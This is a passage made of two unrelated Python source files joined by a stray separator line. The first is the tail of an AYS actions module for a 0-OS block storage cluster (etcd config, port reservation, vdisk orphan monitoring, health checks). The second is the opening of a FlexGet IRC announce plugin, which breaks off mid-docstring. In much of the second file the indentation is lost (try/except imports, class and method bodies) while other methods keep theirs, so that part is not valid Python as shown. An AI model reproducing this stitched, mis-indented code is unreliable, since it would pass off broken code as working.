            create_server(node, disk, baseports[idx], tcpservices[idx])
    # record the created services on the service model
    service.model.data.init('filesystems', len(filesystems))
    service.model.data.init('storageServers', len(storageEngines))
    for index, fs in enumerate(filesystems):
        service.consume(fs)
        service.model.data.filesystems[index] = fs.name
    for index, storageEngine in enumerate(storageEngines):
        service.consume(storageEngine)
        service.model.data.storageServers[index] = storageEngine.name
    # optionally install a Grafana dashboard when a statsdb instance exists
    grafanasrv = service.aysrepo.serviceGet(role='grafana', instance='statsdb', die=False)
    if grafanasrv:
        import json
        from zeroos.orchestrator.sal.StorageCluster import StorageDashboard
        board = StorageDashboard(service).dashboard_template()
        board = json.dumps(board)
        dashboard_actor = service.aysrepo.actorGet('dashboard')
        args = {
            'grafana': 'statsdb',
            'dashboard': board
        }
        dashboardsrv = dashboard_actor.serviceCreate(instance=service.name, args=args)
        service.consume(dashboardsrv)
    job.service.model.data.status = 'empty'
def save_config(job):
    """Write this cluster's storage configuration to etcd.

    Serializes the cluster's dataStorage servers as YAML and stores them
    under the key '<service>:cluster:conf:storage'.

    Raises j.exceptions.RuntimeError when no etcd_cluster service exists.
    """
    import yaml
    from zeroos.orchestrator.sal.StorageCluster import BlockCluster
    from zeroos.orchestrator.sal.ETCD import EtcdCluster
    from zeroos.orchestrator.configuration import get_jwt_token
    job.context['token'] = get_jwt_token(job.service.aysrepo)
    service = job.service
    etcd_clusters = job.service.aysrepo.servicesFind(role='etcd_cluster')
    if not etcd_clusters:
        # BUG FIX: the exception was previously instantiated but never
        # raised, so execution fell through to an IndexError below.
        raise j.exceptions.RuntimeError('No etcd cluster found')
    etcd_cluster = etcd_clusters[0]
    etcd = EtcdCluster.from_ays(etcd_cluster, job.context['token'])
    cluster = BlockCluster.from_ays(service, job.context['token'])
    config = cluster.get_config()
    config = {
        "servers": config["dataStorage"],
    }
    yamlconfig = yaml.safe_dump(config, default_flow_style=False)
    etcd.put(key="%s:cluster:conf:storage" % service.name, value=yamlconfig)
def delete_config(job):
    """
    Remove this block cluster's configuration key from etcd.

    Raises j.exceptions.RuntimeError when no etcd cluster service exists.
    (`j` is the JumpScale global injected by the AYS framework.)
    """
    from zeroos.orchestrator.sal.ETCD import EtcdCluster
    from zeroos.orchestrator.configuration import get_jwt_token

    job.context['token'] = get_jwt_token(job.service.aysrepo)
    service = job.service

    etcd_clusters = job.service.aysrepo.servicesFind(role='etcd_cluster')
    if not etcd_clusters:
        # BUG FIX: the exception was previously constructed but never raised.
        raise j.exceptions.RuntimeError('No etcd cluster found')
    etcd_cluster = etcd_clusters[0]
    etcd = EtcdCluster.from_ays(etcd_cluster, job.context['token'])
    etcd.delete(key="%s:cluster:conf:storage" % service.name)
def get_availabledisks(job):
    """
    Return, per node, the disks of this cluster's disk type that are not yet
    claimed by any storagepool on that node.

    Assumes job.context['token'] was set by the caller.
    :return: dict mapping node name -> list of free disk objects
    """
    from zeroos.orchestrator.sal.StorageCluster import BlockCluster
    from zeroos.orchestrator.utils import find_disks

    service = job.service

    # Devices already claimed by existing storagepools, per node
    used_disks = {}
    for node in service.model.data.nodes:
        pools = service.aysrepo.servicesFind(role='storagepool', parent='node.zero-os!%s' % node)
        taken = set()
        for pool in pools:
            taken.update(device.device for device in pool.model.data.devices)
        used_disks[node] = taken

    cluster = BlockCluster.from_ays(service, job.context['token'])
    partition_name = 'sp_cluster_{}'.format(cluster.name)
    availabledisks = find_disks(service.model.data.diskType, cluster.nodes, partition_name)

    # Keep only the disks that no storagepool has claimed yet
    return {
        node: [disk for disk in disks if disk.devicename not in used_disks[node]]
        for node, disks in availabledisks.items()
    }
def get_baseports(job, node, baseport, nrports):
    """
    Reserve `nrports` free TCP ports on `node`, searching upward from
    `baseport`, and create a `tcp` service for each reserved port.

    :param job: AYS job (used to reach the service repo)
    :param node: node SAL object to reserve ports on
    :param baseport: port number to start searching from
    :param nrports: number of ports needed
    :return: tuple (list of reserved port numbers, list of created tcp services)
    """
    service = job.service
    # Ports already claimed by existing tcp services on this node
    tcps = service.aysrepo.servicesFind(role='tcp', parent='node.zero-os!%s' % node.name)
    usedports = set()
    for tcp in tcps:
        usedports.add(tcp.model.data.port)
    freeports = []
    tcpactor = service.aysrepo.actorGet("tcp")
    tcpservices = []
    while True:
        if baseport not in usedports:
            # Ask the node itself for a free port at or above baseport;
            # the returned port may be higher than the requested one.
            baseport = node.freeports(baseport=baseport, nrports=1)[0]
            args = {
                'node': node.name,
                'port': baseport,
            }
            tcp = 'tcp_{}_{}'.format(node.name, baseport)
            tcpservices.append(tcpactor.serviceCreate(instance=tcp, args=args))
            freeports.append(baseport)
            if len(freeports) >= nrports:
                return freeports, tcpservices
        baseport += 1
def install(job):
    """
    Install the storage cluster: push its grafana dashboard (if one was
    created), persist the cluster config to etcd, mark the service ready and
    run an initial monitor pass.
    """
    from zeroos.orchestrator.configuration import get_jwt_token
    job.context['token'] = get_jwt_token(job.service.aysrepo)
    # Install the dashboard service if one was created for this cluster
    dashboardsrv = job.service.aysrepo.serviceGet(role='dashboard', instance=job.service.name, die=False)
    if dashboardsrv:
        cluster = get_cluster(job)
        dashboardsrv.model.data.dashboard = cluster.dashboard
        dashboardsrv.executeAction('install', context=job.context)
    save_config(job)
    # Mark the start action as already executed so AYS won't re-run it
    job.service.model.actions['start'].state = 'ok'
    job.service.model.data.status = 'ready'
    job.service.saveAll()
    monitor(job)
def start(job):
    """Start the block cluster's storage engines and mark the service ready."""
    service = job.service
    cluster = get_cluster(job)
    job.logger.info("start cluster {}".format(service.name))
    cluster.start()
    job.service.model.data.status = 'ready'
def stop(job):
    """Stop every storage engine consumed by this cluster."""
    from zeroos.orchestrator.configuration import get_jwt_token

    job.context['token'] = get_jwt_token(job.service.aysrepo)
    for engine in job.service.producers.get("storage_engine", []):
        engine.executeAction("stop", context=job.context)
def delete(job):
    """
    Tear the cluster down: drop the tcp port services, stop and remove the
    storage engine containers, delete filesystems and storagepools, then
    remove the cluster config from etcd.
    """
    from zeroos.orchestrator.configuration import get_jwt_token
    job.context['token'] = get_jwt_token(job.service.aysrepo)
    service = job.service
    storageEngines = service.producers.get('storage_engine', [])
    pools = service.producers.get('storagepool', [])
    filesystems = service.producers.get('filesystem', [])
    for storageEngine in storageEngines:
        # Close the firewall ports that were opened for this engine
        tcps = storageEngine.producers.get('tcp', [])
        for tcp in tcps:
            tcp.executeAction('drop', context=job.context)
            tcp.delete()
        # The engine runs inside a container; stop and remove it
        container = storageEngine.parent
        container.executeAction('stop', context=job.context)
        container.delete()
    for filesystem in filesystems:
        filesystem.executeAction('delete', context=job.context)
        filesystem.delete()
    for pool in pools:
        pool.executeAction('delete', context=job.context)
        pool.delete()
    delete_config(job)
    job.logger.info("stop cluster {}".format(service.name))
    job.service.model.data.status = 'empty'
def list_vdisks(job):
    """
    List the vdisks stored on this cluster by running `zeroctl list vdisks`
    inside a temporary 0-disk container on a random non-halted node.

    :return: list of vdisk names (empty list when the cluster holds none)
    """
    import random
    from zeroos.orchestrator.configuration import get_configuration
    from zeroos.orchestrator.sal.Container import Container
    from zeroos.orchestrator.sal.Node import Node
    from zeroos.orchestrator.configuration import get_jwt_token
    from zeroos.orchestrator.sal.ETCD import EtcdCluster
    job.context['token'] = get_jwt_token(job.service.aysrepo)
    service = job.service
    nodes = [node for node in service.producers['node'] if node.model.data.status != "halted"]
    node = random.choice(nodes)
    # create temp container of 0-disk
    container_name = 'vdisk_list_{}'.format(service.name)
    node = Node.from_ays(node, job.context['token'])
    config = get_configuration(job.service.aysrepo)
    container = Container(name=container_name,
                          flist=config.get('0-disk-flist', 'https://hub.gig.tech/gig-official-apps/0-disk-master.flist'),
                          host_network=True,
                          node=node)
    container.start()
    try:
        etcd_cluster_service = service.aysrepo.servicesFind(role='etcd_cluster')[0]
        etcd_cluster_sal = EtcdCluster.from_ays(etcd_cluster_service, job.context['token'])
        cmd = '/bin/zeroctl list vdisks {cluster_id} --config {etcd}'
        cmd = cmd.format(cluster_id=service.name, etcd=etcd_cluster_sal.dialstrings)
        job.logger.debug(cmd)
        result = container.client.system(cmd).get()
        if result.state != 'SUCCESS':
            # return empty list if no vdisks are found
            if not result.stderr:
                return []
            raise j.exceptions.RuntimeError("Failed to run zeroctl list {} {}".format(result.stdout, result.stderr))
        return result.stdout.splitlines()
    finally:
        # Always remove the temporary container, even when zeroctl fails
        container.stop()
def monitor(job):
    """
    Periodic health check for the block cluster:
    - restarts the cluster if it should be running but is not
    - registers orphan vdisks (present on the cluster but unknown to AYS),
      deletes orphans the operator ignored for 7 days, and reports the rest
      through a healthcheck service.
    """
    import time
    from zeroos.orchestrator.sal.StorageCluster import BlockCluster
    from zeroos.orchestrator.configuration import get_jwt_token

    job.context['token'] = get_jwt_token(job.service.aysrepo)
    service = job.service
    cluster = BlockCluster.from_ays(service, job.context['token'])
    if service.model.data.status == 'ready' and not cluster.is_running():
        cluster.start()

    healthcheck_service = job.service.aysrepo.serviceGet(role='healthcheck',
                                                         instance='storagecluster_block_%s' % service.name,
                                                         die=False)
    if healthcheck_service is None:
        healthcheck_actor = service.aysrepo.actorGet('healthcheck')
        # BUG FIX: the instance name must match the serviceGet lookup above;
        # it previously used 'storagecluster.block_%s', so every monitor run
        # created a brand new healthcheck service.
        healthcheck_service = healthcheck_actor.serviceCreate(instance='storagecluster_block_%s' % service.name)
        service.consume(healthcheck_service)

    # Get orphans: vdisks reported by the cluster minus vdisks AYS knows about
    total_disks = set(list_vdisks(job))
    vdisk_services = service.aysrepo.servicesFind(role='vdisk', producer="%s!%s" % (service.model.role, service.name))
    nonorphans = {disk.name for disk in vdisk_services if disk.model.data.status != "orphan"}
    old_orphans_services = {disk for disk in vdisk_services if disk.model.data.status == "orphan"}
    old_orphans = set()
    for orphan_service in old_orphans_services:
        # Delete orphan vdisk if operator didn't act for 7 days
        orphan_time = (int(time.time()) - orphan_service.model.data.timestamp) / (3600 * 24)
        if orphan_time >= 7:
            orphan_service.executeAction('delete', context=job.context)
            orphan_service.delete()
            continue
        old_orphans.add(orphan_service.name)
    new_orphans = total_disks - nonorphans
    total_orphans = new_orphans | old_orphans
    # Register the newly discovered orphans as vdisk services
    actor = service.aysrepo.actorGet('vdisk')
    for orphan in new_orphans:
        args = {
            "status": "orphan",
            "timestamp": int(time.time()),
            "storageCluster": service.name,
        }
        actor.serviceCreate(instance=orphan, args=args)
    healthcheck = {
        "id": "storageclusters",
        "name": "storagecluster orphan vdisk report",
        "messages": [],
    }
    for orphan in total_orphans:
        healthcheck["messages"].append({
            "id": orphan,
            "status": "WARNING",
            "text": "Orphan vdisk %s is found" % orphan,
        })
    update_healthcheck(job, healthcheck_service, healthcheck)
def update_healthcheck(job, health_service, healthchecks):
    """
    Merge the given healthcheck dict(s) into the healthcheck service's model.

    Existing healthchecks (matched by id) are updated in place; unknown ones
    are appended. Each check gets its lasttime and interval refreshed.

    :param job: AYS job
    :param health_service: healthcheck service whose model is updated
    :param healthchecks: a single healthcheck dict or a list of them
    """
    import time
    service = job.service
    # Refresh interval is taken from the monitor action's schedule
    interval = service.model.actionGet('monitor').period
    new_healthchecks = list()
    if not isinstance(healthchecks, list):
        healthchecks = [healthchecks]
    defaultresource = '/storageclusters/{}'.format(service.name)
    for health_check in healthchecks:
        for health in health_service.model.data.healthchecks:
            # If this healthcheck already exists, update its attributes
            if health.id == health_check['id']:
                health.name = health_check.get('name', '')
                health.resource = health_check.get('resource', defaultresource) or defaultresource
                health.messages = health_check.get('messages', [])
                health.category = health_check.get('category', '')
                health.lasttime = time.time()
                health.interval = interval
                health.stacktrace = health_check.get('stacktrace', '')
                break
        else:
            # healthcheck doesn't exist in the current list, add it to the list of new
            health_check['lasttime'] = time.time()
            health_check['interval'] = interval
            new_healthchecks.append(health_check)
    old_healthchecks = health_service.model.data.to_dict().get('healthchecks', [])
    old_healthchecks.extend(new_healthchecks)
    health_service.model.data.healthchecks = old_healthchecks
def addStorageServer(job):
    """Add a storage server to the cluster (not supported yet)."""
    raise NotImplementedError()
def reoveStorageServer(job):
    """Remove a storage server from the cluster (not supported yet)."""
    # NOTE(review): the name looks like a typo of 'removeStorageServer', but it
    # is the public AYS action name — renaming would break the action mapping,
    # so it is left as-is. Confirm before fixing.
    raise NotImplementedError()
| |
from __future__ import unicode_literals, division, absolute_import, with_statement
from builtins import * # noqa pylint: disable=unused-import, redefined-builtin
from past.builtins import basestring
from future.moves.urllib.parse import quote
import os
import re
import threading
import logging
from xml.etree.ElementTree import parse
import io
from uuid import uuid4
import time
from datetime import datetime, timedelta
from flexget.entry import Entry
from flexget.config_schema import register_config_key
from flexget.event import event
from flexget.manager import manager
from flexget.config_schema import one_or_more
from flexget.utils import requests
from flexget.utils.tools import get_config_hash
try:
from irc_bot.irc_bot import IRCBot, partial
from irc_bot import irc_bot
except ImportError as e:
irc_bot = None
IRCBot = object
log = logging.getLogger('irc')

# Strips IRC formatting control codes (reset, underline, bold, color) from messages
MESSAGE_CLEAN = re.compile("\x0f|\x1f|\x02|\x03(?:[\d]{1,2}(?:,[\d]{1,2})?)?", re.MULTILINE | re.UNICODE)
# Extracts http(s) URLs from an announcement line
URL_MATCHER = re.compile(r'(https?://[\da-z\.-]+\.[a-z\.]{2,6}[/\w\.-\?&]*/?)', re.MULTILINE | re.UNICODE)

# Schema fragment for a single IRC channel name (must start with # or &)
channel_pattern = {
    'type': 'string', 'pattern': '^([#&][^\x07\x2C\s]{0,200})',
    'error_pattern': 'channel name must start with # or & and contain no commas and whitespace'
}

# Plugin config schema: a mapping of connection name -> connection options,
# or `False` to disable the plugin entirely
schema = {
    'oneOf': [
        {
            'type': 'object',
            'additionalProperties': {
                'type': 'object',
                'properties': {
                    'tracker_file': {'type': 'string'},
                    'server': {'type': 'string'},
                    'port': {'type': 'integer'},
                    'nickname': {'type': 'string'},
                    'channels': one_or_more(channel_pattern),
                    'nickserv_password': {'type': 'string'},
                    'invite_nickname': {'type': 'string'},
                    'invite_message': {'type': 'string'},
                    'task': one_or_more({
                        'type': 'string'
                    }),
                    'task_re': {
                        'type': 'object',
                        'additionalProperties': one_or_more({
                            'type': 'object',
                            'properties': {
                                'regexp': {'type': 'string'},
                                'field': {'type': 'string'}
                            },
                            'required': ['regexp', 'field'],
                            'additionalProperties': False
                        })
                    },
                    'queue_size': {'type': 'integer', 'default': 1},
                    'use_ssl': {'type': 'boolean', 'default': False},
                    'task_delay': {'type': 'integer'},
                },
                'anyOf': [
                    {'required': ['server', 'channels']},
                    {'required': ['tracker_file']}
                ],
                'error_anyOf': 'Must specify a tracker file or server and channel(s)',
                'oneOf': [
                    {'required': ['task']},
                    {'required': ['task_re']}
                ],
                'error_oneOf': 'Must specify a task',
                'required': ['port'],
                'additionalProperties': {'type': 'string'},
            }
        },
        {'type': 'boolean', 'enum': [False]},
    ]
}

# Global that holds all the IRCConnection instances
irc_connections = {}
# The manager object and thread
irc_manager = None
# To avoid having to restart the connections whenever the config updated event is fired (which is apparently a lot)
config_hash = {}
def create_thread(name, conn):
    """
    Create a daemon thread that will run ``conn.start`` once started.

    Note: the thread is returned *unstarted*; the caller is responsible for
    calling ``start()`` on it. (The old docstring wrongly claimed it started
    the thread.)

    :param name: name to assign to the thread
    :param conn: IRCConnection or IRCConnectionManager object
    :return: threading.Thread
    """
    thread = threading.Thread(target=conn.start, name=name)
    # Attribute assignment instead of the deprecated setDaemon()
    thread.daemon = True
    return thread
def irc_prefix(var):
    """
    Prefix a string with irc_ (lower-cased); non-strings yield None.

    :param var: Variable to prefix
    :return: Prefixed variable, or None when var is not a string
    """
    if not isinstance(var, basestring):
        return None
    return 'irc_%s' % var.lower()
def strip_whitespace(value):
    """
    Remove leading and trailing whitespace from strings. Return value if not a string.

    :param value:
    :return: stripped string or value
    """
    return value.strip() if isinstance(value, basestring) else value
class TrackerFileParseError(Exception):
    """Exception thrown when parsing the .tracker XML file fails"""
class TrackerFileError(Exception):
    """Exception thrown when locating or retrieving the tracker file fails"""
class MissingConfigOption(Exception):
    """Exception thrown when a config option specified in the tracker file is not on the irc config"""
class IRCConnection(IRCBot):
def __init__(self, config, config_name):
self.config = config
self.connection_name = config_name
self.tracker_config = None
self.server_list = []
self.announcer_list = []
self.ignore_lines = []
self.message_regex = []
# If we have a tracker config file, load it
tracker_config_file = config.get('tracker_file')
if tracker_config_file:
self.tracker_config = self.retrieve_tracker_config(tracker_config_file)
channel_list = []
if self.tracker_config is not None:
# Validate config with the settings in the torrent file
for param in self.tracker_config.find('settings'):
# Handle textbox entries
if param.tag == 'textbox':
value_name = param.get('name')
else:
value_name = param.tag
# Strip the gazelle prefix
if value_name.startswith('gazelle_'):
value_name = value_name.replace('gazelle_', '')
# Skip descriptions
if 'description' in value_name:
continue
if self.config.get(value_name) is None:
raise MissingConfigOption('missing configuration option on irc config %s: %s' %
(self.connection_name, value_name))
# Get the tracker name, for use in the connection name
self.connection_name = self.tracker_config.get('longName', config_name)
# Extract the IRC server information
for server in self.tracker_config.find('servers'):
self.server_list.extend(server.get('serverNames').split(','))
channel_list.extend(server.get('channelNames').split(','))
self.announcer_list.extend(server.get('announcerNames').split(','))
# Process ignore lines
for regex_values in self.tracker_config.findall('parseinfo/ignore/regex'):
rx = re.compile(regex_values.get('value'), re.UNICODE | re.MULTILINE)
self.ignore_lines.append((rx, regex_values.get('expected') != 'false'))
# Parse patterns
self.multilinepatterns = self.parse_patterns(list(
self.tracker_config.findall('parseinfo/multilinepatterns/extract')))
self.linepatterns = self.parse_patterns(list(
self.tracker_config.findall('parseinfo/linepatterns/extract')))
# overwrite tracker config with flexget config
if self.config.get('server'):
self.server_list = [self.config['server']]
log.debug('Using server specified from config')
channels = config.get('channels')
if channels:
channel_list = channels if isinstance(channels, list) else [channels]
log.debug('Using channel(s) specified from config')
log.debug('Servers: %s', self.server_list)
log.debug('Channels: %s', channel_list)
log.debug('Announcers: %s', self.announcer_list)
log.debug('Ignore Lines: %d', len(self.ignore_lines))
log.debug('Message Regexs: %d', len(self.multilinepatterns) + len(self.linepatterns))
for rx, vals, optional in self.multilinepatterns:
msg = ' Multilinepattern "%s" extracts %s'
if optional:
msg += ' (optional)'
log.debug(msg, rx.pattern, vals)
for rx, vals, optional in self.linepatterns:
msg = ' Linepattern "%s" extracts %s'
if optional:
msg += ' (optional)'
log.debug(msg, rx.pattern, vals)
# Init the IRC Bot
ircbot_config = {'servers': self.server_list, 'port': config['port'], 'channels': channel_list,
'nickname': config.get('nickname', 'Flexget-%s' % str(uuid4())),
'invite_nickname': config.get('invite_nickname'),
'invite_message': config.get('invite_message'),
'nickserv_password': config.get('nickserv_password'),
'use_ssl': config.get('use_ssl')}
IRCBot.__init__(self, ircbot_config)
self.inject_before_shutdown = False
self.entry_queue = []
self.line_cache = {}
self.processing_message = False # if set to True, it means there's a message processing queued
self.thread = create_thread(self.connection_name, self)
@classmethod
def read_tracker_config(cls, path):
"""
Attempts to open and parse the .tracker file specified in path
:param path: path to .tracker file
:return: the parsed XML
"""
try:
tracker_config = parse(path).getroot()
except Exception as e:
raise TrackerFileParseError('Unable to parse tracker config file %s: %s' % (path, e))
else:
return tracker_config
    @classmethod
    def retrieve_tracker_config(cls, tracker_config_file):
        """
        Will attempt to retrieve the .tracker file from disk or github. Returns the parsed XML.

        Lookup order: exact local path, local path with '.tracker' appended,
        case-insensitive search in the containing dir (or the default
        flexget_config_dir/trackers), then download from the
        autodl-community GitHub repo (saving the file locally on success).

        :param tracker_config_file: URL or path to .tracker file
        :return: parsed XML
        :raises TrackerFileError: when the file cannot be found or fetched
        """
        base_url = 'https://raw.githubusercontent.com/autodl-community/autodl-trackers/master/'
        tracker_config_file = os.path.expanduser(tracker_config_file)
        # First we attempt to find the file locally as-is
        if os.path.exists(tracker_config_file):
            log.debug('Found tracker file: %s', tracker_config_file)
            return cls.read_tracker_config(tracker_config_file)
        if not tracker_config_file.endswith('.tracker'):
            tracker_config_file += '.tracker'
        # Maybe the file is missing extension?
        if os.path.exists(tracker_config_file):
            log.debug('Found tracker file: %s', tracker_config_file)
            return cls.read_tracker_config(tracker_config_file.rsplit('.tracker')[0])
        # Check that containing dir exists, otherwise default to flexget_config_dir/trackers
        if os.path.exists(os.path.dirname(tracker_config_file)):
            base_dir = os.path.dirname(tracker_config_file)
        else:
            base_dir = os.path.abspath(os.path.join(manager.config_base, 'trackers'))
        # Find the filenames for easy use later
        tracker_name = os.path.basename(tracker_config_file)
        tracker_name_no_ext = os.path.splitext(tracker_name)[0]
        # One last try with case insensitive search!
        if os.path.exists(base_dir):
            files = os.listdir(base_dir)
            for f in files:
                if tracker_name_no_ext.lower() in f.lower():
                    found_path = os.path.join(base_dir, f)
                    log.debug('Found tracker file: %s', found_path)
                    return cls.read_tracker_config(found_path)
        # Download from Github instead
        if not os.path.exists(base_dir):  # will only try to create the default `trackers` dir
            try:
                os.mkdir(base_dir)
            except IOError as e:
                raise TrackerFileError(e)
        log.info('Tracker file not found on disk. Attempting to fetch tracker config file from Github.')
        tracker = None
        try:
            tracker = requests.get(base_url + tracker_config_file)
        except (requests.RequestException, IOError):
            pass
        if not tracker:
            try:
                log.debug('Trying to search list of tracker files on Github')
                # Try to see if it's not found due to case sensitivity
                trackers = requests.get('https://api.github.com/repos/autodl-community/'
                                        'autodl-trackers/git/trees/master?recursive=1').json().get('tree', [])
                for t in trackers:
                    name = t.get('path', '')
                    if not name.endswith('.tracker') or name.lower() != tracker_name.lower():
                        continue
                    tracker = requests.get(base_url + name)
                    tracker_name = name
                    break
            except (requests.RequestException, IOError) as e:
                raise TrackerFileError(e)
        if not tracker:
            raise TrackerFileError('Unable to find %s on disk or Github. Did you spell it correctly?' %
                                   tracker_config_file)
        # If we got this far, let's save our work :)
        save_path = os.path.join(base_dir, tracker_name)
        with io.open(save_path, 'wb') as tracker_file:
            for chunk in tracker.iter_content(8192):
                tracker_file.write(chunk)
        return cls.read_tracker_config(save_path)
    def is_alive(self):
        # Truthy when the connection's worker thread exists and is running
        return self.thread and self.thread.is_alive()
def parse_patterns(self, patterns):
"""
Parses the patterns and creates a tuple with the compiled regex pattern and the variables it produces
:param patterns: list of regex patterns as .tracker XML
:return: list of (regex, variables, optional)-pairs
"""
result = []
for pattern in patterns:
rx = re.compile(pattern.find('regex').get('value'), re.UNICODE | re.MULTILINE)
vals = [var.get('name') for idx, var in enumerate(pattern.find('vars'))]
optional = True if pattern.get('optional', 'false').lower() == 'true' else False
result.append((rx, vals, optional))
return result
    def quit(self):
        """
        Quit the IRC bot
        :return:
        """
        # Flush queued entries into their tasks first when a graceful stop requested it
        if self.inject_before_shutdown and self.entry_queue:
            self.run_tasks()
        IRCBot.quit(self)
    def run_tasks(self):
        """
        Passes entries to the target task(s) configured for this connection.

        With `task`, all queued entries are injected into the listed task(s);
        with `task_re`, each entry is routed only to the tasks whose regexps
        match one of its fields. The queue is emptied afterwards either way.
        :return:
        """
        tasks = self.config.get('task')
        tasks_re = self.config.get('task_re')
        if tasks:
            if isinstance(tasks, basestring):
                tasks = [tasks]
            log.debug('Injecting %d entries into tasks %s', len(self.entry_queue), ', '.join(tasks))
            manager.execute(options={'tasks': tasks, 'cron': True, 'inject': self.entry_queue, 'allow_manual': True},
                            priority=5)
        if tasks_re:
            tasks_entry_map = {}
            for entry in self.entry_queue:
                matched = False
                for task, config in tasks_re.items():
                    if isinstance(config, dict):
                        config = [config]
                    for c in config:
                        if re.search(c['regexp'], entry.get(c['field'], ''), re.IGNORECASE):
                            matched = True
                            if not tasks_entry_map.get(task):
                                tasks_entry_map[task] = []
                            tasks_entry_map[task].append(entry)
                if not matched:
                    log.debug('Entry "%s" did not match any task regexp.', entry['title'])
            for task, entries in tasks_entry_map.items():
                log.debug('Injecting %d entries into task "%s"', len(entries), task)
                manager.execute(options={'tasks': [task], 'cron': True, 'inject': entries, 'allow_manual': True},
                                priority=5)
        self.entry_queue = []
def queue_entry(self, entry):
"""
Stores an entry in the connection entry queue, if the queue is over the size limit then submit them
:param entry: Entry to be queued
:return:
"""
self.entry_queue.append(entry)
log.debug('Entry: %s', entry)
if len(self.entry_queue) >= self.config['queue_size']:
if self.config.get('task_delay'):
self.schedule.queue_command(self.config['task_delay'], self.run_tasks, unique=False)
else:
self.run_tasks()
    def match_message_patterns(self, patterns, msg):
        """
        Tries to match the message to the list of patterns. The first pattern
        that matches wins; its captured groups become irc_-prefixed fields.
        :param patterns: list of (regex, variables, optional)-tuples
        :param msg: The parsed IRC message
        :return: A dict of the variables and their extracted values
        """
        result = {}
        for rx, vals, _ in patterns:
            log.debug('Using pattern %s to parse message vars', rx.pattern)
            match = rx.search(msg)
            if match:
                val_names = [irc_prefix(val.lower()) for val in vals]
                # Unmatched optional capture groups (None) become empty strings
                val_values = [strip_whitespace(x) or '' for x in match.groups()]
                result.update(dict(zip(val_names, val_values)))
                log.debug('Found: %s', dict(zip(val_names, val_values)))
                break
            else:
                log.debug('No matches found for %s in %s', rx.pattern, msg)
        return result
    def process_tracker_config_rules(self, entry, rules=None):
        """
        Processes an Entry object with the linematched rules defined in a tracker config file.

        Supported rule tags: var, varreplace, extract, extracttags, extractone,
        setregex and if (which recurses with the rule's children).

        :param entry: Entry to be updated (only its irc_* items are read)
        :param rules: Ruleset to use. Defaults to the tracker's parseinfo/linematched rules.
        :return: dict of the irc_* fields after applying the rules
        """
        ignore_optionals = []
        if rules is None:
            rules = self.tracker_config.find('parseinfo/linematched')
        # Make sure all irc fields from entry are in `fields`
        fields = {key: val for key, val in entry.items() if key.startswith('irc_')}
        for rule in rules:
            log.debug('Processing rule %s' % rule.tag)
            # Var - concat a var from other vars
            if rule.tag == 'var':
                result = ''
                for element in rule:
                    if element.tag == 'string':
                        result += element.get('value')
                    elif element.tag in ['var', 'varenc']:
                        varname = element.get('name')
                        if irc_prefix(varname) in fields:
                            value = fields[irc_prefix(varname)]
                        elif self.config.get(varname):
                            value = self.config.get(varname)
                        else:
                            log.error('Missing variable %s from config, skipping rule', irc_prefix(varname))
                            break
                        if element.tag == 'varenc':
                            value = quote(value.encode('utf-8'))
                        result += value
                    else:
                        log.error('Unsupported var operation %s, skipping rule', element.tag)
                        break
                else:
                    # Only set the result if we processed all elements
                    log.debug('Result for rule %s: %s=%s', rule.tag, rule.get('name'), result)
                    fields[irc_prefix(rule.get('name'))] = result
            # Var Replace - replace text in a var
            elif rule.tag == 'varreplace':
                source_var = irc_prefix(rule.get('srcvar'))
                target_var = irc_prefix(rule.get('name'))
                regex = rule.get('regex')
                replace = rule.get('replace')
                if source_var and target_var and regex is not None and replace is not None and source_var in fields:
                    fields[target_var] = re.sub(regex, replace, fields[source_var])
                    log.debug('varreplace: %s=%s', target_var, fields[target_var])
                else:
                    log.error('Invalid varreplace options, skipping rule')
            # Extract - create multiple vars from a single regex
            elif rule.tag == 'extract':
                source_var = irc_prefix(rule.get('srcvar'))
                if source_var not in fields:
                    if rule.get('optional', 'false') == 'false':
                        log.error('Error processing extract rule, non-optional value %s missing!', source_var)
                    ignore_optionals.append(source_var)
                    continue
                if rule.find('regex') is not None:
                    regex = rule.find('regex').get('value')
                else:
                    log.error('Regex option missing on extract rule, skipping rule')
                    continue
                group_names = [irc_prefix(x.get('name')) for x in rule.find('vars') if x.tag == 'var']
                match = re.search(regex, fields[source_var])
                if match:
                    fields.update(dict(zip(group_names, match.groups())))
                else:
                    log.debug('No match found for rule extract')
            # Extract Tag - set a var if a regex matches a tag in a var
            elif rule.tag == 'extracttags':
                source_var = irc_prefix(rule.get('srcvar'))
                split = rule.get('split')
                if source_var in ignore_optionals:
                    continue
                values = [strip_whitespace(x) for x in fields[source_var].split(split)]
                for element in rule:
                    if element.tag == 'setvarif':
                        target_var = irc_prefix(element.get('varName'))
                        regex = element.get('regex')
                        value = element.get('value')
                        new_value = element.get('newValue')
                        if regex is not None:
                            found_match = False
                            for val in values:
                                match = re.match(regex, val)
                                if match:
                                    fields[target_var] = val
                                    found_match = True
                            if not found_match:
                                log.debug('No matches found for regex %s', regex)
                        elif value is not None and new_value is not None:
                            if value in values:
                                fields[target_var] = new_value
                            else:
                                log.debug('No match found for value %s in %s', value, source_var)
                        else:
                            log.error('Missing regex/value/newValue for setvarif command, ignoring')
            # Extract One - extract one var from a list of regexes
            elif rule.tag == 'extractone':
                for element in rule:
                    if element.tag == 'extract':
                        source_var = irc_prefix(element.get('srcvar'))
                        if element.find('regex') is not None:
                            regex = element.find('regex').get('value')
                        else:
                            log.error('Regex option missing on extract rule, skipping.')
                            continue
                        if element.find('vars') is not None:
                            vars = [irc_prefix(var.get('name')) for var in element.find('vars')]
                        else:
                            log.error('No variable bindings found in extract rule, skipping.')
                            continue
                        match = re.match(regex, fields.get(source_var, ''))
                        if match:
                            fields.update(dict(zip(vars, match.groups())))
                        else:
                            log.debug('No match for extract with regex: %s', regex)
                    else:
                        log.error('Unsupported extractone tag: %s', element.tag)
            # Set Regex - set a var if a regex matches
            elif rule.tag == 'setregex':
                source_var = irc_prefix(rule.get('srcvar'))
                regex = rule.get('regex')
                target_var = irc_prefix(rule.get('varName'))
                target_val = rule.get('newValue')
                if source_var and regex and target_var and target_val:
                    if source_var in fields and re.search(regex, fields[source_var]):
                        fields[target_var] = target_val
                else:
                    log.error('Option missing on setregex, skipping rule')
            # If statement
            elif rule.tag == 'if':
                source_var = irc_prefix(rule.get('srcvar'))
                regex = rule.get('regex')
                if source_var and regex:
                    if source_var in fields and re.match(regex, fields[source_var]):
                        # recurse with the nested rules; `fields` works as the
                        # entry argument because only .items() is read from it
                        fields.update(self.process_tracker_config_rules(fields, rule))
                else:
                    log.error('Option missing for if statement, skipping rule')
            else:
                log.warning('Unsupported linematched tag: %s', rule.tag)
        return fields
    def on_privmsg(self, msg):
        """
        Appends messages for the specific channel in the line cache. Schedules a message processing after 1s to
